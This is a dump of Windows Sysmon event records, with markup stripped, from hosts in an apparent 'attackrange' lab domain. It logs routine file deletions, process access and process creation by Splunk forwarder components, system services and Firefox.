23542300x80000000000000005918685Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:47.231{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55F94CC147AA74E2B1E97B264813870F,SHA256=FA4EB90CAD70FBDB6E38086FFB75D5B628707C0B50C64BDC05EEDF93EE3954F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638855Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:47.146{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=101F98FC11CCB8C93AF5B1931F15BA9F,SHA256=744E6E02F66609B75E80C1BCAB17956A19DBE4FA2495D4661F6FF4A10052321F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918690Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:48.764{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918689Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:48.764{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918688Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:48.359{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8434B75B353F073B18525B578BE1465,SHA256=8806EC2BC8217E425D43EBCEEEA8F5D5B3825B656D2309B60D079AC1E19C948E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638856Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:48.162{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD21B373A3B506B66FFBF7EDA72DD96D,SHA256=AD23931A435BCBF9B44DAB02FC873E7E8C6D42E7DAAC437A8B3D95AC9A120A40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638857Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:49.178{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E44C31A0C8A947044169C09D4C2852AE,SHA256=843DE50DE4D5217960FE9080C82E2941C227785FCD1B306E65CCE9EBE58DC1DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918713Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.940{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B475-605B-9B69-00000000AE01}564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918712Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.938{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918711Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.938{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918710Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.938{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918709Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.938{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918708Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.938{896A638B-B5C8-6058-0500-00000000AE01}396464C:\Windows\system32\csrss.exe{896A638B-B475-605B-9B69-00000000AE01}564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918707Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.937{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B475-605B-9B69-00000000AE01}564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005918706Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.930{896A638B-B475-605B-9B69-00000000AE01}564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005918705Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.764{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918704Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.764{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918703Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.412{896A638B-B475-605B-9A69-00000000AE01}41081404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918702Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.365{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC687670D3E26E2EA68385E202B77558,SHA256=B45407CBA76A6D02E9DB5B8BE6B0EDB135A938904D07C9D577E3452B527BFB58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918701Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.313{896A638B-C9AE-6058-4C07-00000000AE01}3420ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\oktd6i2n.default-release\protections.sqlite-journalMD5=DF5AC4B94B3BDAC81322DDBEEA478A3F,SHA256=971E29F8A13CCA2D2F14559047A8900BB58B8B64B275EECA40FA40879972B154,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918700Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.300{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+51f21|C:\Program Files\Mozilla Firefox\xul.dll+297003d|C:\Program Files\Mozilla Firefox\xul.dll+296fb07|C:\Program Files\Mozilla Firefox\xul.dll+cba859|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+40e3c|C:\Program Files\Mozilla Firefox\xul.dll+113617a|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918699Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.300{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+51f21|C:\Program Files\Mozilla Firefox\xul.dll+297003d|C:\Program Files\Mozilla Firefox\xul.dll+296fb07|C:\Program Files\Mozilla Firefox\xul.dll+cba859|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+40e3c|C:\Program Files\Mozilla Firefox\xul.dll+113617a|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918698Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.266{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B475-605B-9A69-00000000AE01}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918697Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.265{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918696Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.265{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918695Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.264{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918694Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.264{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918693Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.264{896A638B-B5C8-6058-0500-00000000AE01}396512C:\Windows\system32\csrss.exe{896A638B-B475-605B-9A69-00000000AE01}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918692Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.264{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B475-605B-9A69-00000000AE01}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005918691Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:49.250{896A638B-B475-605B-9A69-00000000AE01}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000638858Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:50.193{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E079E29C80049C7F4424E5D022AEFD8,SHA256=E0B2092180FED7AC9F0D8926CF9A4CC623248942DB6272FDF23AAF1FB67596FB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918725Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 